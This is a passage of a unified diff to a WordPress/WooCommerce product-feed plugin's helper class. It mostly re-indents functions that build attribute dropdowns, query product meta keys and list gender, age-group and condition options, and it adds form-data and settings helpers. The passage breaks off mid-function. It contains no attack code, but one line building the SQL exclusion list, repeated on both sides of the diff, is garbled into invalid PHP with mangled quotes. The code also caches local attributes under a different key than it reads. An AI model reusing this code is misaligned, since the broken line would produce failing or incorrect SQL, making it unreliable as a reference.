+					'wtimages_6'       => esc_attr__( 'Additional Image 6', 'webtoffee-product-feed' ),
+					'wtimages_7'       => esc_attr__( 'Additional Image 7', 'webtoffee-product-feed' ),
+					'wtimages_8'       => esc_attr__( 'Additional Image 8', 'webtoffee-product-feed' ),
+					'wtimages_9'       => esc_attr__( 'Additional Image 9', 'webtoffee-product-feed' ),
+					'wtimages_10'      => esc_attr__( 'Additional Image 10', 'webtoffee-product-feed' ),
+				);
+
+				$attribute_dropdown = '<option></option>';
+				$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Constant', 'webtoffee-product-feed' ) );
+				$attribute_dropdown .= sprintf( '<option style="font-weight: bold;" value="%s">%s</option>', 'wt-static-map-vl', esc_attr__( 'Static value', 'webtoffee-product-feed' ) );
+				$attribute_dropdown .= '</optgroup>';
+
+				if ( is_array( $attributes ) && ! empty( $attributes ) ) {
+					$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Primary Attributes', 'webtoffee-product-feed' ) );
+					foreach ( $attributes as $key => $value ) {
 						$attribute_dropdown .= sprintf( '<option value="%s">%s</option>', $key, $value );
 					}
 					$attribute_dropdown .= '</optgroup>';
 				}
-			}
-
-			$global_in_mapping = apply_filters('wt_pf_allow_global_attr_in_mapping', true);
-			if($global_in_mapping){
-				$product_global_attrs = self::get_global_attributes();
-				if ( is_array( $product_global_attrs ) && ! empty( $product_global_attrs ) ) {
-					$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Product Attributes', 'webtoffee-product-feed' ) );
-					foreach ( $product_global_attrs as $key => $value ) {
+
+				if ( is_array( $images ) && ! empty( $images ) ) {
+					$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Image Attributes', 'webtoffee-product-feed' ) );
+					foreach ( $images as $key => $value ) {
 						$attribute_dropdown .= sprintf( '<option value="%s">%s</option>', $key, $value );
 					}
 					$attribute_dropdown .= '</optgroup>';
 				}
-			}
-
-			$local_in_mapping = apply_filters('wt_pf_allow_local_attr_in_mapping', true);
-			if($local_in_mapping){
-				$product_local_attrs = self::get_local_attributes();
-				if ( is_array( $product_local_attrs ) && ! empty( $product_local_attrs ) ) {
-					$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Product Custom Attributes', 'webtoffee-product-feed' ) );
-					foreach ( $product_local_attrs as $key => $value ) {
-						$attribute_dropdown .= sprintf( '<option value="%s">%s</option>', $key, $value );
+
+				$meta_in_mapping = apply_filters('wt_pf_allow_meta_in_mapping', true);
+				if($meta_in_mapping){
+					$product_metas = self::get_product_metakeys();
+					if ( is_array( $product_metas ) && ! empty( $product_metas ) ) {
+						$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Custom Fields/Post Meta', 'webtoffee-product-feed' ) );
+						foreach ( $product_metas as $key => $value ) {
+							$attribute_dropdown .= sprintf( '<option value="%s">%s</option>', $key, $value );
+						}
+						$attribute_dropdown .= '</optgroup>';
+					}
+				}
+
+				$global_in_mapping = apply_filters('wt_pf_allow_global_attr_in_mapping', true);
+				if($global_in_mapping){
+					$product_global_attrs = self::get_global_attributes();
+					if ( is_array( $product_global_attrs ) && ! empty( $product_global_attrs ) ) {
+						$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Product Attributes', 'webtoffee-product-feed' ) );
+						foreach ( $product_global_attrs as $key => $value ) {
+							$attribute_dropdown .= sprintf( '<option value="%s">%s</option>', $key, $value );
+						}
+						$attribute_dropdown .= '</optgroup>';
 					}
-					$attribute_dropdown .= '</optgroup>';
 				}
-			}
-
-			wp_cache_add( 'wt_feed_dropdown_product_attributes_v11', $attribute_dropdown, '', WEEK_IN_SECONDS );
+
+				$local_in_mapping = apply_filters('wt_pf_allow_local_attr_in_mapping', true);
+				if($local_in_mapping){
+					$product_local_attrs = self::get_local_attributes();
+					if ( is_array( $product_local_attrs ) && ! empty( $product_local_attrs ) ) {
+						$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Product Custom Attributes', 'webtoffee-product-feed' ) );
+						foreach ( $product_local_attrs as $key => $value ) {
+							$attribute_dropdown .= sprintf( '<option value="%s">%s</option>', $key, $value );
+						}
+						$attribute_dropdown .= '</optgroup>';
+					}
+				}
+
+				wp_cache_add( 'wt_feed_dropdown_product_attributes_v11', $attribute_dropdown, '', WEEK_IN_SECONDS );
+			}
+
+			if( $selected && strpos($selected, 'wt_static_map_vl:') !== false ){
+				$selected = 'wt-static-map-vl';
+			}
+			if ( $selected && strpos( $attribute_dropdown, 'value="' . $selected . '"' ) !== false ) {
+				$attribute_dropdown = str_replace( 'value="' . $selected . '"', 'value="' . $selected . '"' . ' selected', $attribute_dropdown );
+			}
+
+			return apply_filters( 'wt_feed_product_attributes_dropdown', $attribute_dropdown, $export_channel, $selected);
 		}

-		if( $selected && strpos($selected, 'wt_static_map_vl:') !== false ){
-			$selected = 'wt-static-map-vl';
-		}
-		if ( $selected && strpos( $attribute_dropdown, 'value="' . $selected . '"' ) !== false ) {
-			$attribute_dropdown = str_replace( 'value="' . $selected . '"', 'value="' . $selected . '"' . ' selected', $attribute_dropdown );
-		}

-		return apply_filters( 'wt_feed_product_attributes_dropdown', $attribute_dropdown, $export_channel, $selected);
-	}
-
-
-
-	/**
-	 * Get All Custom Attributes
-	 *
-	 * @return array
-	 */
-	private static function get_product_metakeys() {
-		$attribute_dropdown = wp_cache_get( 'wt_feed_dropdown_product_custom_meta_v8' );
-		if ( false === $attribute_dropdown ) {
-			global $wpdb;
-			$attribute_dropdown = [];
+
+		/**
+		 * Get All Custom Attributes
+		 *
+		 * @return array
+		 */
+		private static function get_product_metakeys() {
+			$attribute_dropdown = wp_cache_get( 'wt_feed_dropdown_product_custom_meta_v8' );
+			if ( false === $attribute_dropdown ) {
+				global $wpdb;
+				$attribute_dropdown = [];
+
+				$attribute_dropdown['fb_product_category'] =  __('Facebook Product Category', 'webtoffee-product-feed');
+				$attribute_dropdown['google_product_category'] = __('Google Product Category', 'webtoffee-product-feed');
+				$attribute_dropdown['brand'] = __( 'Brand', 'webtoffee-product-feed' );
+				$attribute_dropdown['gtin'] = __( 'GTIN', 'webtoffee-product-feed' );
+				$attribute_dropdown['mpn'] = __( 'MPN', 'webtoffee-product-feed' );
+				$attribute_dropdown['age_group'] = __( 'Age group', 'webtoffee-product-feed' );
+				$attribute_dropdown['gender'] = __( 'Gender', 'webtoffee-product-feed' );
+				$attribute_dropdown['color'] = __( 'Color', 'webtoffee-product-feed' );
+				$attribute_dropdown['size'] = __( 'Size', 'webtoffee-product-feed' );
+				$attribute_dropdown['material'] = __( 'Material', 'webtoffee-product-feed' );
+				$attribute_dropdown['pattern'] = __( 'Pattern', 'webtoffee-product-feed' );
+				$attribute_dropdown['unit_pricing_measure'] = __( 'Unit pricing measure', 'webtoffee-product-feed' );
+				$attribute_dropdown['unit_pricing_base_measure'] = __( 'Unit pricing base measure', 'webtoffee-product-feed' );
+				$attribute_dropdown['energy_efficiency_class'] = __( 'Energy efficiency class', 'webtoffee-product-feed' );
+				$attribute_dropdown['min_energy_efficiency_class'] = __( 'Min energy efficiencycclass', 'webtoffee-product-feed' );
+				$attribute_dropdown['max_energy_efficiency_class'] = __( 'Max energy efficiency class', 'webtoffee-product-feed' );
+				$attribute_dropdown['shipping_data'] = __('Shipping', 'webtoffee-product-feed');
+							$attribute_dropdown['quantity_to_sell_on_facebook'] = __( 'Quantity to sell on facebook', 'webtoffee-product-feed' );
+
+				$attribute_dropdown['pickup_method'] = __( 'Pickup Method', 'webtoffee-product-feed' );
+				$attribute_dropdown['pickup_sla'] = __( 'Pickup SLA', 'webtoffee-product-feed' );
+
+				$attribute_dropdown['custom_label_0'] = __( 'Custom label 0', 'webtoffee-product-feed' );
+				$attribute_dropdown['custom_label_1'] = __( 'Custom label 1', 'webtoffee-product-feed' );
+				$attribute_dropdown['custom_label_2'] = __( 'Custom label 2', 'webtoffee-product-feed' );
+				$attribute_dropdown['custom_label_3'] = __( 'Custom label 3', 'webtoffee-product-feed' );
+				$attribute_dropdown['custom_label_4'] = __( 'Custom label 4', 'webtoffee-product-feed' );
+							$attribute_dropdown['additional_variant_attribute'] = __( 'additional_variant_attribute', 'webtoffee-product-feed' );
+
+							$attribute_dropdown['link_template'] = __('Link template', 'webtoffee-product-feed' );
+							$attribute_dropdown['mobile_link_template'] = __('Mobile Link template', 'webtoffee-product-feed' );
+							$attribute_dropdown['store_code'] = __('Store code', 'webtoffee-product-feed' );
+							$attribute_dropdown['vat'] = __('VAT', 'webtoffee-product-feed' );
+
+
+
+
+				$default_exclude_keys = [
+					// WP internals.
+					'_edit_lock',
+					'_wp_old_slug',
+					'_edit_last',
+					'_wp_old_date',
+					// WC internals.
+					'_downloadable_files',
+					'_sku',
+					'_weight',
+					'_width',
+					'_height',
+					'_length',
+					'_file_path',
+					'_file_paths',
+					'_default_attributes',
+					'_product_attributes',
+					'_children',
+					'_variation_description',
+					// ignore variation description, engine will get child product description from WC CRUD WC_Product::get_description().
+					// Plugin Data.
+					'_wpcom_is_markdown',
+					// JetPack Meta.
+					'_yith_wcpb_bundle_data',
+					// Yith product bundle data.
+					'_et_builder_version',
+					// Divi builder data.
+					'_vc_post_settings',
+					// Visual Composer (WP Bakery) data.
+					'_enable_sidebar',
+					'frs_woo_product_tabs',
+				];
+
+				/**
+				 * Exclude meta keys from dropdown
+				 *
+				 * @param array $exclude              meta keys to exclude.
+				 * @param array $default_exclude_keys Exclude keys by default.
+				 */
+				$user_exclude = apply_filters( 'wt_feed_dropdown_exclude_meta_keys', null, $default_exclude_keys );
+
+				if ( is_array( $user_exclude ) && ! empty( $user_exclude ) ) {
+					$user_exclude         = esc_sql( $user_exclude );
+					$default_exclude_keys = array_merge( $default_exclude_keys, $user_exclude );
+				}
+
+				$default_exclude_keys = array_map( 'esc_sql', $default_exclude_keys );
+				$exclude_keys         = ''' . implode( '', '', $default_exclude_keys ) . ''';
+
+				$default_exclude_key_patterns = [
+					'%_et_pb_%', // Divi builder data
+					'attribute_%', // Exclude product attributes from meta list
+					'_yoast_wpseo_%', // Yoast SEO Data
+					'_acf-%', // ACF duplicate fields
+					'_aioseop_%', // All In One SEO Pack Data
+					'_oembed%', // exclude oEmbed cache meta
+					'_wpml_%', // wpml metas
+					'_oh_add_script_%', // SOGO Add Script to Individual Pages Header Footer.
+									'_wt_facebook_%', // This plugin meta
+									'_wt_google_%', // This plugin meta
+									'_wt_feed_%', // This plugin meta
+				];
+
+				/**
+				 * Exclude meta key patterns from dropdown
+				 *
+				 * @param array $exclude                      meta keys to exclude.
+				 * @param array $default_exclude_key_patterns Exclude keys by default.
+				 */
+				$user_exclude_patterns = apply_filters( 'wt_feed_dropdown_exclude_meta_keys_pattern', null, $default_exclude_key_patterns );
+				if ( is_array( $user_exclude_patterns ) && ! empty( $user_exclude_patterns ) ) {
+					$default_exclude_key_patterns = array_merge( $default_exclude_key_patterns, $user_exclude_patterns );
+				}
+				$exclude_key_patterns = '';
+				foreach ( $default_exclude_key_patterns as $pattern ) {
+					$exclude_key_patterns .= $wpdb->prepare( ' AND meta_key NOT LIKE %s', $pattern );
+				}
+
+				$sql = sprintf( /** @lang text */ "SELECT DISTINCT( meta_key ) FROM %s WHERE 1=1 AND post_id IN ( SELECT ID FROM %s WHERE post_type = 'product' OR post_type = 'product_variation' ) AND ( meta_key NOT IN ( %s ) %s )", $wpdb->postmeta, $wpdb->posts, $exclude_keys, $exclude_key_patterns );
+
+				// sql escaped, cached
+				$data = $wpdb->get_results( $sql ); // phpcs:ignore
+
+				if ( count( $data ) ) {
+					foreach ( $data as $value ) {
+						//TODO Remove ACF Fields
+						$attribute_dropdown[ 'meta:' . $value->meta_key ] = $value->meta_key;
+					}
+				}
+							$attribute_dropdown['meta:_yoast_wpseo_title'] = __('Yoast Title', 'webtoffee-product-feed'); // Yoast Title
+							$attribute_dropdown['meta:_yoast_wpseo_metadesc'] = __('Yoast Description', 'webtoffee-product-feed'); // Yoast Description
+							$attribute_dropdown['meta:_aioseo_title'] = __('All in One SEO Title', 'webtoffee-product-feed'); // All in One SEO Title
+							$attribute_dropdown['meta:_aioseo_description'] = __('All in One SEO Description', 'webtoffee-product-feed'); // All in One SEO Description
+							$attribute_dropdown['meta:rank_math_title'] = __('Rank Math SEO Title', 'webtoffee-product-feed'); // Rank Math SEO Title
+							$attribute_dropdown['meta:rank_math_description'] = __('Rank Math SEO Description', 'webtoffee-product-feed'); // Rank Math SEO Description
+
+				wp_cache_add( 'wt_feed_dropdown_product_custom_meta_v8', $attribute_dropdown, '', WEEK_IN_SECONDS );

-			$attribute_dropdown['fb_product_category'] =  __('Facebook Product Category', 'webtoffee-product-feed');
-			$attribute_dropdown['google_product_category'] = __('Google Product Category', 'webtoffee-product-feed');
-			$attribute_dropdown['brand'] = __( 'Brand', 'webtoffee-product-feed' );
-			$attribute_dropdown['gtin'] = __( 'GTIN', 'webtoffee-product-feed' );
-			$attribute_dropdown['mpn'] = __( 'MPN', 'webtoffee-product-feed' );
-			$attribute_dropdown['age_group'] = __( 'Age group', 'webtoffee-product-feed' );
-			$attribute_dropdown['gender'] = __( 'Gender', 'webtoffee-product-feed' );
-			$attribute_dropdown['color'] = __( 'Color', 'webtoffee-product-feed' );
-			$attribute_dropdown['size'] = __( 'Size', 'webtoffee-product-feed' );
-			$attribute_dropdown['material'] = __( 'Material', 'webtoffee-product-feed' );
-			$attribute_dropdown['pattern'] = __( 'Pattern', 'webtoffee-product-feed' );
-			$attribute_dropdown['unit_pricing_measure'] = __( 'Unit pricing measure', 'webtoffee-product-feed' );
-			$attribute_dropdown['unit_pricing_base_measure'] = __( 'Unit pricing base measure', 'webtoffee-product-feed' );
-			$attribute_dropdown['energy_efficiency_class'] = __( 'Energy efficiency class', 'webtoffee-product-feed' );
-			$attribute_dropdown['min_energy_efficiency_class'] = __( 'Min energy efficiencycclass', 'webtoffee-product-feed' );
-			$attribute_dropdown['max_energy_efficiency_class'] = __( 'Max energy efficiency class', 'webtoffee-product-feed' );
-			$attribute_dropdown['shipping_data'] = __('Shipping', 'webtoffee-product-feed');
-                        $attribute_dropdown['quantity_to_sell_on_facebook'] = __( 'Quantity to sell on facebook', 'webtoffee-product-feed' );
-
-			$attribute_dropdown['pickup_method'] = __( 'Pickup Method', 'webtoffee-product-feed' );
-			$attribute_dropdown['pickup_sla'] = __( 'Pickup SLA', 'webtoffee-product-feed' );
-
-			$attribute_dropdown['custom_label_0'] = __( 'Custom label 0', 'webtoffee-product-feed' );
-			$attribute_dropdown['custom_label_1'] = __( 'Custom label 1', 'webtoffee-product-feed' );
-			$attribute_dropdown['custom_label_2'] = __( 'Custom label 2', 'webtoffee-product-feed' );
-			$attribute_dropdown['custom_label_3'] = __( 'Custom label 3', 'webtoffee-product-feed' );
-			$attribute_dropdown['custom_label_4'] = __( 'Custom label 4', 'webtoffee-product-feed' );
-                        $attribute_dropdown['additional_variant_attribute'] = __( 'additional_variant_attribute', 'webtoffee-product-feed' );
-
-                        $attribute_dropdown['link_template'] = __('Link template', 'webtoffee-product-feed' );
-                        $attribute_dropdown['mobile_link_template'] = __('Mobile Link template', 'webtoffee-product-feed' );
-                        $attribute_dropdown['store_code'] = __('Store code', 'webtoffee-product-feed' );
-                        $attribute_dropdown['vat'] = __('VAT', 'webtoffee-product-feed' );
-
-
-
-
-			$default_exclude_keys = [
-				// WP internals.
-				'_edit_lock',
-				'_wp_old_slug',
-				'_edit_last',
-				'_wp_old_date',
-				// WC internals.
-				'_downloadable_files',
-				'_sku',
-				'_weight',
-				'_width',
-				'_height',
-				'_length',
-				'_file_path',
-				'_file_paths',
-				'_default_attributes',
-				'_product_attributes',
-				'_children',
-				'_variation_description',
-				// ignore variation description, engine will get child product description from WC CRUD WC_Product::get_description().
-				// Plugin Data.
-				'_wpcom_is_markdown',
-				// JetPack Meta.
-				'_yith_wcpb_bundle_data',
-				// Yith product bundle data.
-				'_et_builder_version',
-				// Divi builder data.
-				'_vc_post_settings',
-				// Visual Composer (WP Bakery) data.
-				'_enable_sidebar',
-				'frs_woo_product_tabs',
-			];
-
-			/**
-			 * Exclude meta keys from dropdown
-			 *
-			 * @param array $exclude              meta keys to exclude.
-			 * @param array $default_exclude_keys Exclude keys by default.
-			 */
-			$user_exclude = apply_filters( 'wt_feed_dropdown_exclude_meta_keys', null, $default_exclude_keys );
-
-			if ( is_array( $user_exclude ) && ! empty( $user_exclude ) ) {
-				$user_exclude         = esc_sql( $user_exclude );
-				$default_exclude_keys = array_merge( $default_exclude_keys, $user_exclude );
 			}

-			$default_exclude_keys = array_map( 'esc_sql', $default_exclude_keys );
-			$exclude_keys         = ''' . implode( '', '', $default_exclude_keys ) . ''';
-
-			$default_exclude_key_patterns = [
-				'%_et_pb_%', // Divi builder data
-				'attribute_%', // Exclude product attributes from meta list
-				'_yoast_wpseo_%', // Yoast SEO Data
-				'_acf-%', // ACF duplicate fields
-				'_aioseop_%', // All In One SEO Pack Data
-				'_oembed%', // exclude oEmbed cache meta
-				'_wpml_%', // wpml metas
-				'_oh_add_script_%', // SOGO Add Script to Individual Pages Header Footer.
-                                '_wt_facebook_%', // This plugin meta
-                                '_wt_google_%', // This plugin meta
-                                '_wt_feed_%', // This plugin meta
-			];
+			return apply_filters( 'wt_feed_product_additional_fields', $attribute_dropdown );
+		}
+

-			/**
-			 * Exclude meta key patterns from dropdown
-			 *
-			 * @param array $exclude                      meta keys to exclude.
-			 * @param array $default_exclude_key_patterns Exclude keys by default.
-			 */
-			$user_exclude_patterns = apply_filters( 'wt_feed_dropdown_exclude_meta_keys_pattern', null, $default_exclude_key_patterns );
-			if ( is_array( $user_exclude_patterns ) && ! empty( $user_exclude_patterns ) ) {
-				$default_exclude_key_patterns = array_merge( $default_exclude_key_patterns, $user_exclude_patterns );
-			}
-			$exclude_key_patterns = '';
-			foreach ( $default_exclude_key_patterns as $pattern ) {
-				$exclude_key_patterns .= $wpdb->prepare( ' AND meta_key NOT LIKE %s', $pattern );
+		public static function get_global_attributes() {
+
+			$global_attribute_dropdown = wp_cache_get( 'wt_feed_dropdown_product_global_attr_v4' );
+			if ( false === $global_attribute_dropdown ) {
+				$global_attribute_dropdown = array();
+				// Load the main attributes
+				$global_attributes = wc_get_attribute_taxonomy_labels();
+				if ( count( $global_attributes ) ) {
+					foreach ( $global_attributes as $key => $value ) {
+						$global_attribute_dropdown['wt_pf_pa_' . $key ] = $value;
+					}
+				}
+				wp_cache_set( 'wt_feed_dropdown_product_global_attr_v4', $global_attribute_dropdown, '', WEEK_IN_SECONDS );
 			}
+					return apply_filters( 'wt_feed_product_global_attributes_fields', $global_attribute_dropdown );
+		}

-			$sql = sprintf( /** @lang text */ "SELECT DISTINCT( meta_key ) FROM %s WHERE 1=1 AND post_id IN ( SELECT ID FROM %s WHERE post_type = 'product' OR post_type = 'product_variation' ) AND ( meta_key NOT IN ( %s ) %s )", $wpdb->postmeta, $wpdb->posts, $exclude_keys, $exclude_key_patterns );
-
-			// sql escaped, cached
-			$data = $wpdb->get_results( $sql ); // phpcs:ignore
-
-			if ( count( $data ) ) {
-				foreach ( $data as $value ) {
-					//TODO Remove ACF Fields
-					$attribute_dropdown[ 'meta:' . $value->meta_key ] = $value->meta_key;
+		public static function get_local_attributes() {
+			$attributes = wp_cache_get( 'wt_feed_dropdown_product_local_attr_v4' );
+			if ( false === $attributes ) {
+				$attributes = self::get_variations_attributes();
+				$attributes += self::get_product_custom_attributes();
+
+				wp_cache_set( 'wt_feed_dropdown_product_local_attr_v1', $attributes, '', WEEK_IN_SECONDS );
+			}
+					return apply_filters( 'wt_feed_product_local_attributes_fields', $attributes );
+		}
+
+		public static function get_variations_attributes() {
+
+			global $wpdb;
+			$attributes = array();
+
+			$sql        = $wpdb->prepare(
+				"SELECT DISTINCT( meta_key ) FROM {$wpdb->postmeta}
+				WHERE post_id IN (
+					SELECT ID FROM {$wpdb->posts} WHERE post_type = %s
+				) AND (
+					meta_key LIKE %s
+					AND meta_key NOT LIKE %s
+				)",
+				'product_variation',
+				'attribute_%',
+				'attribute_pa_%'
+			);
+			$local_attributes = $wpdb->get_col( $sql ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery,WordPress.DB.DirectDatabaseQuery.NoCaching,WordPress.DB.PreparedSQL.NotPrepared
+			foreach ( $local_attributes as $local_attribute ) {
+				$local_attribute  = str_replace( 'attribute_', '', $local_attribute );
+				$attributes[ 'wt_pf_cattr_' . $local_attribute ] = ucwords( str_replace( '-', ' ', $local_attribute ) );
+			}
+
+			return $attributes;
+		}
+
+
+		public static function get_product_custom_attributes() {
+			global $wpdb;
+			$attributes       = array();
+			// Note: Table names cannot be prepared with placeholders in WordPress
+			$sql              = $wpdb->prepare(
+				'SELECT meta.meta_id, meta.meta_key as name, meta.meta_value as type FROM ' . $wpdb->postmeta . ' AS meta, ' . $wpdb->posts . ' AS posts WHERE meta.post_id = posts.id AND posts.post_type LIKE %s AND meta.meta_key = %s',
+				'%product%',
+				'_product_attributes'
+			);
+			$custom_attributes = $wpdb->get_results( $sql ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery,WordPress.DB.DirectDatabaseQuery.NoCaching,WordPress.DB.PreparedSQL.NotPrepared
+			if ( ! empty( $custom_attributes ) ) {
+				foreach ( $custom_attributes as $value ) {
+					$product_attr = maybe_unserialize( $value->type );
+					if ( is_array( $product_attr ) ) {
+						foreach ( $product_attr as $key => $arr_value ) {
+							if ( strpos( $key, 'pa_' ) === false ) {
+								$attributes[ 'wt_pf_cattr_'. $key ] = ucwords( str_replace( '-', ' ', $arr_value['name'] ) );
+							}
+						}
+					}
 				}
 			}
-                        $attribute_dropdown['meta:_yoast_wpseo_title'] = __('Yoast Title', 'webtoffee-product-feed'); // Yoast Title
-                        $attribute_dropdown['meta:_yoast_wpseo_metadesc'] = __('Yoast Description', 'webtoffee-product-feed'); // Yoast Description
-                        $attribute_dropdown['meta:_aioseo_title'] = __('All in One SEO Title', 'webtoffee-product-feed'); // All in One SEO Title
-                        $attribute_dropdown['meta:_aioseo_description'] = __('All in One SEO Description', 'webtoffee-product-feed'); // All in One SEO Description
-                        $attribute_dropdown['meta:rank_math_title'] = __('Rank Math SEO Title', 'webtoffee-product-feed'); // Rank Math SEO Title
-                        $attribute_dropdown['meta:rank_math_description'] = __('Rank Math SEO Description', 'webtoffee-product-feed'); // Rank Math SEO Description

-			wp_cache_add( 'wt_feed_dropdown_product_custom_meta_v8', $attribute_dropdown, '', WEEK_IN_SECONDS );
+			return $attributes;
+		}
+
+		public static function get_geneder_list(){
+				$gender_options = array(
+			'male'           => _x( 'Male', 'product gender', 'webtoffee-product-feed' ),
+			'female'   => _x( 'Female', 'product gender', 'webtoffee-product-feed' ),
+			'unisex'          => _x( 'Unisex', 'product gender', 'webtoffee-product-feed' ),
+		);

+		return apply_filters( 'wt_feed_product_gender_options', $gender_options );
 		}
+
+		public static function get_age_group(){
+			$age_group	 = array(
+				'all ages' => __( 'All ages', 'webtoffee-product-feed' ),
+				'adult' => __( 'Adult', 'webtoffee-product-feed' ),
+				'teen' => __( 'Teen', 'webtoffee-product-feed' ),
+				'kids' => __( 'Kids', 'webtoffee-product-feed' ),
+				'toddler' => __( 'Toddler', 'webtoffee-product-feed' ),
+				'infant' => __( 'Infant', 'webtoffee-product-feed' ),
+				'newborn' => __( 'Newborn', 'webtoffee-product-feed' )
+			);
+
+			return apply_filters( 'wt_feed_product_agegroup', $age_group );
+		}
+			public static function wt_feed_get_product_conditions() {
+					$conditions = array(
+							'new'           => _x( 'New', 'product condition', 'webtoffee-product-feed' ),
+							'refurbished'   => _x( 'Refurbished', 'product condition', 'webtoffee-product-feed' ),
+							'used'          => _x( 'Used', 'product condition', 'webtoffee-product-feed' ),
+							'used_like_new' => _x( 'Used like new', 'product condition', 'webtoffee-product-feed' ),
+							'used_good'     => _x( 'Used good', 'product condition', 'webtoffee-product-feed' ),
+							'used_fair'     => _x( 'Used fair', 'product condition', 'webtoffee-product-feed' ),
+					);
+
+					return apply_filters( 'wt_feed_facebook_product_conditions', $conditions );
+			}

-		return apply_filters( 'wt_feed_product_additional_fields', $attribute_dropdown );
-	}
-
-
-	public static function get_global_attributes() {
-
-        $global_attribute_dropdown = wp_cache_get( 'wt_feed_dropdown_product_global_attr_v4' );
-		if ( false === $global_attribute_dropdown ) {
-			$global_attribute_dropdown = array();
-			// Load the main attributes
-			$global_attributes = wc_get_attribute_taxonomy_labels();
-			if ( count( $global_attributes ) ) {
-				foreach ( $global_attributes as $key => $value ) {
-					$global_attribute_dropdown['wt_pf_pa_' . $key ] = $value;
-				}
-			}
-			wp_cache_set( 'wt_feed_dropdown_product_global_attr_v4', $global_attribute_dropdown, '', WEEK_IN_SECONDS );
-		}
-                return apply_filters( 'wt_feed_product_global_attributes_fields', $global_attribute_dropdown );
-	}
-
-	public static function get_local_attributes() {
-		$attributes = wp_cache_get( 'wt_feed_dropdown_product_local_attr_v4' );
-		if ( false === $attributes ) {
-			$attributes = self::get_variations_attributes();
-			$attributes += self::get_product_custom_attributes();
+		/**
+		*   Decode the post data as normal array from json encoded from data.
+		*   If step key is specified, then it will return the data corresponds to the form key
+		*   @param array $form_data
+		*   @param string $key
+		*/
+		public static function process_formdata($form_data, $key='')
+		{
+			/**
+			 * 2.3.4 - Added to handle the json encoded data.
+			 */
+			$form_data = is_serialized($form_data) ? self::wt_unserialize_safe($form_data) : $form_data;
+			$form_data = is_string($form_data) ? json_decode($form_data, true) : $form_data;
+
+			if($key!="") /* if key is given then take its data */
+			{
+				if(isset($form_data[$key]))
+				{
+					if(is_array($form_data[$key]))
+					{
+						$form_data_vl=$form_data[$key];
+					}else
+					{
+						$form_data_vl=json_decode(stripslashes($form_data[$key]),true);
+					}
+				}else
+				{
+					$form_data_vl=array();
+				}
+			}else
+			{
+				$form_data_vl=array();
+
+				// Check if $form_data is an array before iterating
+				if(is_array($form_data))
+				{
+					foreach($form_data as $form_datak=>$form_datav)
+					{
+						$form_data_vl[$form_datak]=self::process_formdata($form_data, $form_datak);
+					}
+				}
+			}

-			wp_cache_set( 'wt_feed_dropdown_product_local_attr_v1', $attributes, '', WEEK_IN_SECONDS );
+			return (is_array($form_data_vl) ? $form_data_vl : array());
 		}
-                return apply_filters( 'wt_feed_product_local_attributes_fields', $attributes );
-	}

-	public static function get_variations_attributes() {
+		/**
+		*   Form field generator
+		*/
+		public static function field_generator($form_fields, $form_data)
+		{
+			include plugin_dir_path( dirname( __FILE__ ) ).'admin/partials/_form_field_generator.php';
+		}

-		global $wpdb;
-		$attributes = array();

-		$sql        = $wpdb->prepare(
-			"SELECT DISTINCT( meta_key ) FROM {$wpdb->postmeta}
-			WHERE post_id IN (
-			    SELECT ID FROM {$wpdb->posts} WHERE post_type = %s
-			) AND (
-			    meta_key LIKE %s
-			    AND meta_key NOT LIKE %s
-			)",
-			'product_variation',
-			'attribute_%',
-			'attribute_pa_%'
-		);
-		$local_attributes = $wpdb->get_col( $sql ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery,WordPress.DB.DirectDatabaseQuery.NoCaching,WordPress.DB.PreparedSQL.NotPrepared
-		foreach ( $local_attributes as $local_attribute ) {
-			$local_attribute  = str_replace( 'attribute_', '', $local_attribute );
-			$attributes[ 'wt_pf_cattr_' . $local_attribute ] = ucwords( str_replace( '-', ' ', $local_attribute ) );
+		/**
+		*   Save advanced settings
+		*   @param  array   $settings   array of setting values
+		*/
+		public static function set_advanced_settings($settings)
+		{
+			update_option('wt_pf_advanced_settings', $settings);
 		}

-		return $attributes;
-	}
+		/**
+		*
+		*   Extract validation rule from form field array
+		*   @param  array   $fields   form field array
+		*/
+		public static function extract_validation_rules($fields)
+		{
+			$out=array_map(function ($r) { return (isset($r['validation_rule']) ? $r['validation_rule'] : ''); }, $fields);
+			return array_filter($out);
+		}

+		/**
+		*   Get advanced settings.
+		*   @param      string  $key    key for specific setting (optional)
+		*   @return     mixed   if key provided then the value of key otherwise array of values
+		*/
+		public static function get_advanced_settings($key="")
+		{
+			$advanced_settings=get_option('wt_pf_advanced_settings');
+			$advanced_settings=($advanced_settings ? $advanced_settings : array());
+			if($key!="")
+			{
+				$key=(substr($key,0,8)!=='wt_pf_' ? 'wt_pf_' : '').$key;
+				if(isset($advanced_settings[$key]))
+				{
+					return $advanced_settings[$key];
+				}else
+				{
+					$default_settings=self::get_advanced_settings_default();
+					return (isset($default_settings[$key]) ? $default_settings[$key] : '');
+				}
+			}else
+			{
+				$default_settings=self::get_advanced_settings_default();
+				$advanced_settings=wp_parse_args($advanced_settings, $default_settings);
+				return $advanced_settings;
+			}
+		}

-	public static function get_product_custom_attributes() {
-		global $wpdb;
-		$attributes       = array();
-		// Note: Table names cannot be prepared with placeholders in WordPress
-		$sql              = $wpdb->prepare(
-			'SELECT meta.meta_id, meta.meta_key as name, meta.meta_value as type FROM ' . $wpdb->postmeta . ' AS meta, ' . $wpdb->posts . ' AS posts WHERE meta.post_id = posts.id AND posts.post_type LIKE %s AND meta.meta_key = %s',
-			'%product%',
-			'_product_attributes'
-		);
-		$custom_attributes = $wpdb->get_results( $sql ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery,WordPress.DB.DirectDatabaseQuery.NoCaching,WordPress.DB.PreparedSQL.NotPrepared
-		if ( ! empty( $custom_attributes ) ) {
-			foreach ( $custom_attributes as $value ) {
-				$product_attr = maybe_unserialize( $value->type );
-				if ( is_array( $product_attr ) ) {
-					foreach ( $product_attr as $key => $arr_value ) {
-						if ( strpos( $key, 'pa_' ) === false ) {
